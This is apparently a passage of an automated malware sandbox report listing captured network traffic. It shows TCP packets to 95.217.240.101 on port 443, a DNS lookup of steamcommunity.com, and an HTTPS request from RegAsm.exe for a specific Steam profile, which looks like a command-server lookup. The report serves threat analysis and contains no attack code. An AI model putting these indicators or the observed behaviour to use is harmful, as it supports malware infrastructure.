                                                                                  May 15, 2024 20:36:17.041512966 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.041548014 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.043746948 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.043760061 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.043807983 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.043811083 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.043844938 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046169043 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046201944 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046220064 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046222925 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046243906 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046257019 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046262026 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.046302080 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046629906 CEST49751443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.046642065 CEST4434975195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.122545958 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.122581005 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.122648954 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.122827053 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.122843027 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.594315052 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.597814083 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.598490000 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.598503113 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:17.598664045 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:17.598669052 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341727018 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341764927 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341778994 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341841936 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.341871977 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341892004 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.341897964 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.341922998 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.341938972 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.448378086 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.448400021 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.448477983 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.448487997 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.448533058 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.599562883 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.599581003 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.599659920 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.599670887 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.599710941 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.703548908 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.703566074 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.703722000 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.703731060 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.703772068 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.783608913 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.783626080 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.783813953 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.783823013 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.783868074 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.840761900 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.840795040 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.840847969 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.840854883 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.840892076 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.887262106 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.887276888 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.887339115 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.887346983 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.887382984 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.929986000 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.930006027 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.930134058 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.930140972 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.930176973 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.974948883 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.974966049 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.975039005 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:18.975045919 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:18.975090027 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.019793987 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.019809008 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.019866943 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.019876957 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.019913912 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.058573961 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.058593035 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.058633089 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.058640003 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.058650970 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.058670998 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.085510969 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.085536003 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.085681915 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.085690975 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.085737944 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.111994028 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.112010002 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.112087965 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.112095118 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.112135887 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.134331942 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.134347916 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.134413958 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.134423971 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.134460926 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.157144070 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.157161951 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.157207012 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.157215118 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.157247066 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.173675060 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.173716068 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.173734903 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.173742056 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.173753023 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.173765898 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.173779011 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.173804998 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.174098015 CEST49752443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.174112082 CEST4434975295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.199829102 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.199862003 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.199924946 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.200205088 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.200217962 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.666714907 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.666820049 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.667326927 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.667335987 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:19.667504072 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:19.667507887 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.406429052 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.406452894 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.406466961 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.406477928 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.406498909 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.406506062 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.406527996 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.406548977 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.511924028 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.511943102 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.512018919 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.512027979 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.512064934 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.661165953 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.661186934 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.661246061 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.661258936 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.661267042 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.661288977 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.763534069 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.763555050 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.763803959 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.763817072 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.763881922 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.830476046 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.830529928 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.830571890 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:20.830619097 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.830665112 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.838951111 CEST49753443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:20.838972092 CEST4434975395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:21.193774939 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:21.193810940 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:21.193890095 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:21.194093943 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:21.194108009 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:21.666440964 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:21.666520119 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:21.694741011 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:21.694750071 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:21.694925070 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:21.694930077 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:21.694948912 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:21.694955111 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:22.699568987 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:22.699645042 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:22.699732065 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:23.706454992 CEST49754443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:23.706476927 CEST4434975495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:23.787750006 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:23.787796974 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:23.787866116 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:23.788119078 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:23.788135052 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:24.253423929 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:24.253541946 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:24.254105091 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:24.254111052 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:24.254323006 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:24.254328012 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.141690016 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.141710043 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.141769886 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.141779900 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.141820908 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.142076969 CEST49755443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.142090082 CEST4434975595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.144334078 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.144361019 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.144438028 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.144632101 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.144644022 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.609837055 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.609905958 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.610356092 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.610361099 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:25.610538006 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:25.610543013 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:26.520844936 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:26.520910025 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:26.520927906 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:26.520960093 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:26.521200895 CEST49756443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:26.521219015 CEST4434975695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:26.538132906 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:26.538158894 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:26.538225889 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:26.538465977 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:26.538474083 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:27.043344021 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:27.043423891 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:27.043874979 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:27.043879986 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:27.044079065 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:27.044083118 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:27.945219994 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:27.945278883 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:27.945393085 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:27.946229935 CEST49757443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:27.946242094 CEST4434975795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:28.631943941 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:28.631989002 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:28.632097960 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:28.632378101 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:28.632390022 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:29.097826004 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:29.097913027 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:29.098381996 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:29.098388910 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:29.098560095 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:29.098563910 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:29.098629951 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:29.098640919 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:29.098731995 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:29.098750114 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:29.098970890 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:29.098987103 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:29.099098921 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:29.099123001 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:30.871279001 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:30.871356964 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:30.871372938 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:30.871423960 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:30.871568918 CEST49758443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:30.871586084 CEST4434975895.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:30.875029087 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:30.875061989 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:30.875139952 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:30.875329971 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:30.875341892 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:31.373950958 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:31.374073029 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:31.374763966 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:31.374772072 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:31.375241995 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:31.375247002 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.309161901 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.309247017 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.309262991 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.309294939 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.309314966 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.309345007 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.309504986 CEST49759443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.309519053 CEST4434975995.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.311326027 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.311373949 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.311466932 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.311731100 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.311738968 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.777136087 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.777228117 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.777801991 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.777812004 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:32.778048992 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:32.778053999 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:33.676810026 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:33.676867008 CEST4434976095.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:33.676986933 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:33.676986933 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:33.677092075 CEST49760443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:33.677110910 CEST4434976095.217.240.101192.168.2.4

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 15, 2024 20:35:50.009427071 CEST5822353192.168.2.41.1.1.1
                                                                                  May 15, 2024 20:35:50.120599031 CEST53582231.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  May 15, 2024 20:35:50.009427071 CEST192.168.2.41.1.1.10xbd2Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  May 15, 2024 20:35:50.120599031 CEST1.1.1.1192.168.2.40xbd2No error (0)steamcommunity.com23.194.234.100A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • steamcommunity.com
                                                                                  • 95.217.240.101

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.44973023.194.234.1004435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:50 UTC119OUTGET /profiles/76561199686524322 HTTP/1.1
                                                                                  Host: steamcommunity.com
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:51 UTC1882INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Date: Wed, 15 May 2024 18:35:51 GMT
                                                                                  Content-Length: 35643
                                                                                  Connection: close
                                                                                  Set-Cookie: sessionid=5ec96a72569b8cd0a0d36a61; Path=/; Secure; SameSite=None
                                                                                  Set-Cookie: steamCountry=US%7Cbce9df44965cd26b147023c797831e66; Path=/; Secure; HttpOnly; SameSite=None
